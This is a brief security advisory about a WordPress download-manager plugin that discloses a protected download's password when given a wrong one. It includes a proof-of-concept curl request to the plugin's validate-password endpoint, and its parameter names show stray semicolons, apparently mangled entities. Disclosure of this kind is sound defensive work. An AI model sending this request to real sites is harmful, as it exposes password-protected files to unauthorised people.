Description The plugin does not protect file download’s passwords, leaking it upon receiving an invalid one.
223 being the ID of a password protected download: curl -X POST --data ‘__wpdm_ID=223&dataType;=json&execute;=wpdm_getlink&action;=wpdm_ajax_call&password;=123322’ https://example.com/wp-json/wpdm/validate-password The response will contain the password in the ‘op’ field